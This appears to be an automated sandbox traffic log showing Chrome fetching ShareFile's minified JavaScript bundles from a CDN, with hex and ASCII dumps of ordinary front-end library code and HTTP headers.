                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 29 28 74 68 69 73 2c 65 29 2c 74 68 69 73 2e 6e 61 6d 65 3d 22 72 65 61 63 74 50 6f 73 74 70 72 6f 63 65 73 73 6f 72 22 2c 74 68 69 73 2e 74 79 70 65 3d 22 70 6f 73 74 50 72 6f 63 65 73 73 6f 72 22 2c 74 68 69 73 2e 6b 65 65 70 55 6e 6b 6e 6f 77 6e 56 61 72 69 61 62 6c 65 73 3d 74 2e 6b 65 65 70 55 6e 6b 6e 6f 77 6e 56 61 72 69 61 62 6c
                                                                                                                                                                                                                                                                                Data Ascii: .length>0&&void 0!==arguments[0]?arguments[0]:{};(function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")})(this,e),this.name="reactPostprocessor",this.type="postProcessor",this.keepUnknownVariables=t.keepUnknownVariabl
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 6f 6e 74 65 6e 74 55 6e 69 74 73 7c 6d 61 73 6b 55 6e 69 74 73 7c 6d 61 74 68 65 6d 61 74 69 63 61 6c 7c 6d 6f 64 65 7c 6e 75 6d 4f 63 74 61 76 65 73 7c 6f 66 66 73 65 74 7c 6f 70 61 63 69 74 79 7c 6f 70 65 72 61 74 6f 72 7c 6f 72 64 65 72 7c 6f 72 69 65 6e 74 7c 6f 72 69 65 6e 74 61 74 69 6f 6e 7c 6f 72 69 67 69 6e 7c 6f 76 65 72 66 6c 6f 77 7c 6f 76 65 72 6c 69 6e 65 50 6f 73 69 74 69 6f 6e 7c 6f 76 65 72 6c 69 6e 65 54 68 69 63 6b 6e 65 73 73 7c 70 61 6e 6f 73 65 31 7c 70 61 69 6e 74 4f 72 64 65 72 7c 70 61 74 68 4c 65 6e 67 74 68 7c 70 61 74 74 65 72 6e 43 6f 6e 74 65 6e 74 55 6e 69 74 73 7c 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 7c 70 61 74 74 65 72 6e 55 6e 69 74 73 7c 70 6f 69 6e 74 65 72 45 76 65 6e 74 73 7c 70 6f 69 6e 74 73 7c 70 6f 69
                                                                                                                                                                                                                                                                                Data Ascii: ontentUnits|maskUnits|mathematical|mode|numOctaves|offset|opacity|operator|order|orient|orientation|origin|overflow|overlinePosition|overlineThickness|panose1|paintOrder|pathLength|patternContentUnits|patternTransform|patternUnits|pointerEvents|points|poi
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 2d 35 30 30 70 78 29 3b 5c 6e 5c 74 22 2c 22 5c 6e 22 5d 29 29 2c 6b 2e 4b 66 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 65 6e 74 65 72 65 64 22 3d 3d 3d 28 74 3d 65 2e 61 6e 69 6d 61 74 69 6f 6e 53 74 61 74 65 29 3f 45 3a 22 65 78 69 74 69 6e 67 22 3d 3d 3d 74 3f 78 3a 6e 75 6c 6c 3b 76 61 72 20 74 7d 29 29 2c 4f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 28 30 2c 6c 2e 5a 29 28 6e 2c 65 29 3b 76 61 72 20 74 3d 28 30 2c 64 2e 5a 29 28 6e 29 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 76 61 72 20 65 3b 28 30 2c 73 2e 5a 29 28 74 68 69 73 2c 6e 29 3b 66 6f 72 28 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6f 3d 6e 65 77 20 41 72 72 61 79 28 72 29 2c 61 3d 30 3b 61 3c 72 3b 61
                                                                                                                                                                                                                                                                                Data Ascii: m: translateX(-500px);\n\t","\n"])),k.Kf,(function(e){return"entered"===(t=e.animationState)?E:"exiting"===t?x:null;var t})),O=function(e){(0,l.Z)(n,e);var t=(0,d.Z)(n);function n(){var e;(0,s.Z)(this,n);for(var r=arguments.length,o=new Array(r),a=0;a<r;a
                                                                                                                                                                                                                                                                                2024-10-09 18:05:24 UTC16384INData Raw: 2c 65 29 2c 6f 2e 64 65 66 61 75 6c 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 63 6c 69 70 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 64 3a 22 4d 31 32 20 30 43 35 2e 33 37 33 20 30 20 30 20 35 2e 33 37 33 20 30 20 31 32 73 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 43 32 33 2e 39 39 33 20 35 2e 33 37 36 20 31 38 2e 36 32 34 2e 30 30 37 20 31 32 20 30 5a 6d 2e 32 35 20 35 61 31 2e 35 20 31 2e 35 20 30 20 31 31 30 20 33 20 31 2e 35 20 31 2e 35 20 30 20 30 31 30 2d 33 5a 6d 32 2e 32 35 20 31 33 2e 35 68 2d 34 61 31 20 31 20 30 20 31 31 30 2d 32 68 2e 37 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 32 35 2d 2e 32 35 76 2d 34 2e 35
                                                                                                                                                                                                                                                                                Data Ascii: ,e),o.default.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M12 0C5.373 0 0 5.373 0 12s5.373 12 12 12 12-5.373 12-12C23.993 5.376 18.624.007 12 0Zm.25 5a1.5 1.5 0 110 3 1.5 1.5 0 010-3Zm2.25 13.5h-4a1 1 0 110-2h.75a.25.25 0 00.25-.25v-4.5
                                                                                                                                                                                                                                                                                2024-10-09 18:05:24 UTC16384INData Raw: 69 6f 6e 22 2c 45 6d 70 74 79 4e 6f 74 69 66 69 63 61 74 69 6f 6e 73 49 63 6f 6e 3a 22 4e 6f 74 69 66 69 63 61 74 69 6f 6e 20 69 6c 6c 75 73 74 72 61 74 69 6f 6e 22 2c 45 6d 70 74 79 50 65 6f 70 6c 65 49 63 6f 6e 3a 22 50 65 6f 70 6c 65 20 69 6c 6c 75 73 74 72 61 74 69 6f 6e 22 2c 45 6d 70 74 79 53 65 61 72 63 68 49 63 6f 6e 3a 22 53 65 61 72 63 68 20 69 6c 6c 75 73 74 72 61 74 69 6f 6e 22 2c 45 6d 70 74 79 53 65 72 76 65 72 49 63 6f 6e 3a 22 53 65 72 76 65 72 20 69 6c 6c 75 73 74 72 61 74 69 6f 6e 22 2c 45 6d 70 74 79 53 69 67 6e 61 74 75 72 65 49 63 6f 6e 3a 22 53 69 67 6e 65 64 20 64 6f 63 75 6d 65 6e 74 20 69 6c 6c 75 73 74 72 61 74 69 6f 6e 22 2c 45 6d 70 74 79 54 65 6d 70 6c 61 74 65 73 49 63 6f 6e 3a 22 54 65 6d 70 6c 61 74 65 20 69 6c 6c 75 73 74
                                                                                                                                                                                                                                                                                Data Ascii: ion",EmptyNotificationsIcon:"Notification illustration",EmptyPeopleIcon:"People illustration",EmptySearchIcon:"Search illustration",EmptyServerIcon:"Server illustration",EmptySignatureIcon:"Signed document illustration",EmptyTemplatesIcon:"Template illust
                                                                                                                                                                                                                                                                                2024-10-09 18:05:24 UTC16384INData Raw: 73 65 72 65 20 70 61 72 69 20 6f 20 73 75 70 65 72 69 6f 72 65 20 61 20 7b 7b 6e 75 6d 62 65 72 7d 7d 22 2c 6d 75 73 74 42 65 47 72 65 61 74 65 72 45 72 72 6f 72 3a 22 49 6c 20 6e 75 6d 65 72 6f 20 64 65 76 65 20 65 73 73 65 72 65 20 73 75 70 65 72 69 6f 72 65 20 61 20 7b 7b 6e 75 6d 62 65 72 7d 7d 22 2c 6d 75 73 74 42 65 4c 65 73 73 45 71 75 61 6c 45 72 72 6f 72 3a 22 49 6c 20 6e 75 6d 65 72 6f 20 64 65 76 65 20 65 73 73 65 72 65 20 70 61 72 69 20 6f 20 69 6e 66 65 72 69 6f 72 65 20 61 20 7b 7b 6e 75 6d 62 65 72 7d 7d 22 2c 6d 75 73 74 42 65 4c 65 73 73 45 72 72 6f 72 3a 22 49 6c 20 6e 75 6d 65 72 6f 20 64 65 76 65 20 65 73 73 65 72 65 20 69 6e 66 65 72 69 6f 72 65 20 61 20 7b 7b 6e 75 6d 62 65 72 7d 7d 22 2c 6e 6f 74 4e 75 6d 62 65 72 3a 22 49 6c 20 74
                                                                                                                                                                                                                                                                                Data Ascii: sere pari o superiore a {{number}}",mustBeGreaterError:"Il numero deve essere superiore a {{number}}",mustBeLessEqualError:"Il numero deve essere pari o inferiore a {{number}}",mustBeLessError:"Il numero deve essere inferiore a {{number}}",notNumber:"Il t


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                143192.168.2.64987113.224.189.1154432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC422OUTGET /sharefile-web/sharefiledev-fileviewer-pilet/1.29.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC550INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 1165518
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 30 Sep 2024 07:00:08 GMT
                                                                                                                                                                                                                                                                                ETag: "b1017618baa776fde10e1abb9b5576d1"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 b6d1611761652d7a383651f2bf480596.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: AgeDKEKkw--I6rCxF_j8fLgDGauhEdaePdY5xJdAzgVGHeoWF9IUCg==
                                                                                                                                                                                                                                                                                Age: 45982
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC15834INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 66 69 6c 65 76 69 65 77 65 72 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 69 3d 7b 7d 2c 73 3d 7b 7d 3b 72 65 74 75 72 6e 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 2e 63 6f 6c 6f 72 50 61 6c 65 74 74 65 3d 65 2e 63 6f 6c 6f 72 50 61 6c 65 74 74 65 2c 6e 2e 64 65 66 61 75 6c 74 41 6e 74 44 43 6f 6e 66 69 67 3d 65 2e 64 65 66 61 75 6c 74
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevfileviewerpilet,{})System.register(["@sharefiledev/antd-config","antd","react","tslib"],(function(e,t){var n={},r={},i={},s={};return{setters:[function(e){n.colorPalette=e.colorPalette,n.defaultAntDConfig=e.default
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 3b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 7c 7c 21 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 7c 7c 21 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 6e 3d 74 2e 63 73 70 2c 72 3d 74 2e 70 72 65 70 65 6e 64 2c 69 3d 74 2e 70 72 69 6f 72 69 74 79 2c 73 3d 76 6f 69 64 20 30 3d 3d 3d 69 3f 30 3a 69 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 71 75 65 75 65 22 3d 3d 3d 65 3f 22 70 72 65 70 65 6e 64 51 75 65 75 65 22 3a 65 3f 22 70 72 65 70 65 6e 64 22 3a 22 61 70 70 65 6e 64 22 7d 28 72 29 2c 6f 3d 22 70 72 65 70 65 6e 64 51
                                                                                                                                                                                                                                                                                Data Ascii: uments[1]?arguments[1]:{};if("undefined"==typeof window||!window.document||!window.document.createElement)return null;var n=t.csp,r=t.prepend,i=t.priority,s=void 0===i?0:i,a=function(e){return"queue"===e?"prependQueue":e?"prepend":"append"}(r),o="prependQ
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 2e 37 34 37 2c 78 32 3a 31 31 2e 37 34 37 2c 79 31 3a 31 35 2e 38 39 36 2c 79 32 3a 31 32 2e 33 30 36 2c 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3a 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 7d 2c 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 74 6f 70 22 2c 7b 73 74 6f 70 43 6f 6c 6f 72 3a 22 23 37 37 31 33 31 35 22 7d 29 2c 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 74 6f 70 22 2c 7b 6f 66 66 73 65 74 3a 2e 30 36 35 2c 73 74 6f 70 43 6f 6c 6f 72 3a 22 23 37 39 31 34 31 36 22 7d 29 2c 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 74 6f 70 22 2c 7b 6f 66 66 73 65 74 3a 2e 36 32 31 2c 73 74 6f 70 43 6f 6c 6f 72 3a 22 23 38 37 31 38 31 41 22 7d 29 2c 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 74 6f 70 22 2c 7b 6f 66
                                                                                                                                                                                                                                                                                Data Ascii: .747,x2:11.747,y1:15.896,y2:12.306,gradientUnits:"userSpaceOnUse"},i.createElement("stop",{stopColor:"#771315"}),i.createElement("stop",{offset:.065,stopColor:"#791416"}),i.createElement("stop",{offset:.621,stopColor:"#87181A"}),i.createElement("stop",{of
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 37 31 32 20 30 20 2e 35 31 39 2d 2e 34 38 35 2e 37 36 34 2d 31 2e 32 30 38 2e 37 36 34 2d 2e 36 30 37 20 30 2d 31 2e 32 30 37 2d 2e 32 37 34 2d 31 2e 33 36 35 2d 2e 39 34 35 68 2d 31 2e 32 34 38 63 2e 31 39 38 20 31 2e 33 36 35 20 31 2e 33 35 39 20 31 2e 39 34 38 20 32 2e 36 31 39 20 31 2e 39 34 38 22 7d 29 29 7d 2c 61 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 66 74 2c 73 28 7b 7d 2c 65 2c 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 73 6e 7d 29 29 7d 2c 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 76 67 22 2c 7b 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 77 69 64 74
                                                                                                                                                                                                                                                                                Data Ascii: 712 0 .519-.485.764-1.208.764-.607 0-1.207-.274-1.365-.945h-1.248c.198 1.365 1.359 1.948 2.619 1.948"}))},an=function(e){return i.createElement(ft,s({},e,{component:sn}))},on=function(){return i.createElement("svg",{xmlns:"http://www.w3.org/2000/svg",widt
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 78 22 5d 2c 77 6f 72 64 3a 5b 22 64 6f 63 22 2c 22 64 6f 63 6d 22 2c 22 64 6f 63 78 22 2c 22 64 6f 74 22 2c 22 64 6f 74 6d 22 2c 22 64 6f 74 78 22 2c 22 72 74 66 22 5d 2c 7a 69 70 3a 5b 22 37 7a 22 2c 22 62 7a 32 22 2c 22 67 7a 22 2c 22 72 61 72 22 2c 22 7a 69 70 22 2c 22 7a 69 70 78 22 5d 7d 3b 66 75 6e 63 74 69 6f 6e 20 59 6e 28 65 29 7b 69 66 28 65 2e 69 73 43 6f 6e 74 61 69 6e 65 72 29 72 65 74 75 72 6e 20 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 50 74 2c 7b 73 69 7a 65 3a 65 2e 73 69 7a 65 2c 63 6f 6c 6f 72 3a 65 2e 63 6f 6c 6f 72 7d 29 3b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 65 78 74 65 6e 73 69 6f 6e 4e 61 6d 65 2c 6e 3d 65 2e 73 69 7a 65 2c 72 3d 65 2e 63 6f 6c 6f 72 3b 69 66 28 6e 75 6c 6c 3d 3d 74
                                                                                                                                                                                                                                                                                Data Ascii: x"],word:["doc","docm","docx","dot","dotm","dotx","rtf"],zip:["7z","bz2","gz","rar","zip","zipx"]};function Yn(e){if(e.isContainer)return i.createElement(Pt,{size:e.size,color:e.color});var t=function(e){var t=e.extensionName,n=e.size,r=e.color;if(null==t
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 74 72 28 29 2e 6d 61 72 6b 28 28 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 76 61 72 20 6e 2c 72 2c 69 3b 72 65 74 75 72 6e 20 74 72 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 65 2e 70 72 65 76 3d 65 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 65 2e 70 72 65 76 3d 30 2c 65 2e 6e 65 78 74 3d 33 2c 66 65 74 63 68 28 74 29 3b 63 61 73 65 20 33 3a 69 66 28 28 6e 3d 65 2e 73 65 6e 74 29 2e 6f 6b 29 7b 65 2e 6e 65 78 74 3d 36 3b 62 72 65 61 6b 7d 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 46 61 69 6c 65 64 20 74 6f 20 64 6f 77 6e 6c 6f 61 64 20 66 69 6c 65 22 29 3b 63 61 73 65 20 36 3a 72 65 74 75 72 6e 20 65 2e 6e 65 78 74 3d 38 2c 6e
                                                                                                                                                                                                                                                                                Data Ascii: void 0,void 0,tr().mark((function e(){var n,r,i;return tr().wrap((function(e){for(;;)switch(e.prev=e.next){case 0:return e.prev=0,e.next=3,fetch(t);case 3:if((n=e.sent).ok){e.next=6;break}throw new Error("Failed to download file");case 6:return e.next=8,n
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 29 7b 65 3d 6e 2c 74 3d 72 7d 29 29 3b 72 65 74 75 72 6e 20 6e 2e 72 65 73 6f 6c 76 65 3d 65 2c 6e 2e 72 65 6a 65 63 74 3d 74 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 55 72 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 22 22 3a 22 22 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 57 72 28 65 2c 74 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 69 6e 64 65 78 4f 66 28 22 23 23 23 22 29 3e 2d 31 3f 65 2e 72 65 70 6c 61 63 65 28 2f 23 23 23 2f 67 2c 22 2e 22 29 3a 65 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 72 65 74 75 72 6e 21 65 7c 7c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 7d 66 6f 72 28 76 61 72 20 73 3d 22 73 74 72 69 6e 67
                                                                                                                                                                                                                                                                                Data Ascii: =new Promise((function(n,r){e=n,t=r}));return n.resolve=e,n.reject=t,n}function Ur(e){return null==e?"":""+e}function Wr(e,t,n){function r(e){return e&&e.indexOf("###")>-1?e.replace(/###/g,"."):e}function i(){return!e||"string"==typeof e}for(var s="string
                                                                                                                                                                                                                                                                                2024-10-09 18:05:24 UTC16384INData Raw: 67 75 61 67 65 43 6f 64 65 28 74 2e 6a 6f 69 6e 28 22 2d 22 29 29 29 7d 7d 2c 7b 6b 65 79 3a 22 67 65 74 4c 61 6e 67 75 61 67 65 50 61 72 74 46 72 6f 6d 43 6f 64 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 7c 7c 65 2e 69 6e 64 65 78 4f 66 28 22 2d 22 29 3c 30 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 74 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 66 6f 72 6d 61 74 4c 61 6e 67 75 61 67 65 43 6f 64 65 28 74 5b 30 5d 29 7d 7d 2c 7b 6b 65 79 3a 22 66 6f 72 6d 61 74 4c 61 6e 67 75 61 67 65 43 6f 64 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 2e 69 6e 64 65 78 4f 66 28 22 2d 22 29 3e 2d 31 29 7b 76 61 72
                                                                                                                                                                                                                                                                                Data Ascii: guageCode(t.join("-")))}},{key:"getLanguagePartFromCode",value:function(e){if(!e||e.indexOf("-")<0)return e;var t=e.split("-");return this.formatLanguageCode(t[0])}},{key:"formatLanguageCode",value:function(e){if("string"==typeof e&&e.indexOf("-")>-1){var
                                                                                                                                                                                                                                                                                2024-10-09 18:05:24 UTC16384INData Raw: 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6e 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 3b 74 25 32 3f 53 69 28 4f 62 6a 65 63 74 28 6e 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6d 28 65 2c 74 2c 6e 5b 74 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 6e 29 29 3a 53 69 28 4f 62 6a 65 63 74 28 6e 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f
                                                                                                                                                                                                                                                                                Data Ascii: ngth;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?Si(Object(n),!0).forEach((function(t){m(e,t,n[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(n)):Si(Object(n)).forEach((function(t){Object.definePro
                                                                                                                                                                                                                                                                                2024-10-09 18:05:24 UTC16384INData Raw: 72 2c 65 29 7c 7c 69 26 26 21 61 28 73 2c 65 29 29 29 7d 7d 2c 7b 6b 65 79 3a 22 6c 6f 61 64 4e 61 6d 65 73 70 61 63 65 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 68 69 73 2c 72 3d 42 72 28 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6e 73 3f 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 65 3d 5b 65 5d 29 2c 65 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 2e 6f 70 74 69 6f 6e 73 2e 6e 73 2e 69 6e 64 65 78 4f 66 28 65 29 3c 30 26 26 6e 2e 6f 70 74 69 6f 6e 73 2e 6e 73 2e 70 75 73 68 28 65 29 7d 29 29 2c 74 68 69 73 2e 6c 6f 61 64 52 65 73 6f 75 72 63 65 73 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 2e 72 65 73 6f 6c 76 65 28 29 2c 74 26 26 74
                                                                                                                                                                                                                                                                                Data Ascii: r,e)||i&&!a(s,e)))}},{key:"loadNamespaces",value:function(e,t){var n=this,r=Br();return this.options.ns?("string"==typeof e&&(e=[e]),e.forEach((function(e){n.options.ns.indexOf(e)<0&&n.options.ns.push(e)})),this.loadResources((function(e){r.resolve(),t&&t


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                144192.168.2.64987313.224.189.1154432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC421OUTGET /sharefile-web/sharefiledev-tenant-mgt-pilet/1.2.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC549INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 172013
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Thu, 03 Oct 2024 13:08:00 GMT
                                                                                                                                                                                                                                                                                ETag: "1b4bef66080aa287b1d9e5454fb07741"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 e86025dac63232624d2273c5fd256ce4.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
